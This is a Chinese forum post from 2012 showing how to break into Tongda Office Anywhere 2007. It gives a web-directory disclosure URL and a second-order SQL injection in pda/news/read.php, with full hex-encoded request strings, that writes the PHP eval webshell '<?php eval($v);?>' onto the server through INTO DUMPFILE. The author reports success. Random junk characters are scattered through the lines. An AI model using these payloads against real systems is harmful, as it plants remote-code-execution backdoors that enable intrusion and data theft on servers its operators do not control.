找回密码
 立即注册
查看: 3547|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本3 N: w. j7 p# y8 ]. H" S

5 A& T: l; o8 I) d& y7 d9 z! u
  R" R7 N+ N! c9 h4 r2 wOffice Anywhere 2007 网络智能办公系统
% T# W6 c3 M' n3 c2 x; }( R % d- P' \5 A: o  N, Z7 c# n" I2 Y
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
2 c1 v& @9 S8 \( J- x# |5 E
6 k5 q5 \; F7 x8 v ) s3 c" s: h# C$ f
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的8 L, \. D1 m, x1 x$ @) z

; E; F( w/ y- I( d) }+ G' @: u- S例如:SELECT * from USER where USER_ID='{$USERNAME}'  
, r7 o1 C+ U/ k* v其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
; P/ h: H1 j4 \/ Q2 X, Z
- F! h0 b1 }- E1 a0 v这个时候我们是不是可以组合起来使用哪?
: ^3 p% Y0 w6 H: f: N
7 \0 v9 q& S! u% W( W* @& X4 U; {第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
/ E  S, R: B6 v: M! G5 ]7 Bunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
! J. Z# P6 A- H; ]
% c1 V# @' Z+ E5 Q这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
8 {9 w+ b% ~% b$ U- ~6 L , w8 A+ G! W6 Y2 f$ ]
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。$ C  o, T; C  K: k( Z# F6 Q- K; s4 v+ p
$ R. A2 W7 }" G
那么我们用字符串格式带入进行hex编码  U# r4 a/ l) L
1 O8 [6 F3 ?6 Q
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
( L/ S" ]9 E" x5 H* N8 A& \ # D' w  r, f" s7 Y
测试ok,获取oa的webshell7 I3 C6 X+ r. V1 ^" A% F

+ M4 C6 {5 z4 b% l3 C 4 @1 B# G3 \7 w! u
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23  Z) U, n# m" J* J- H
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表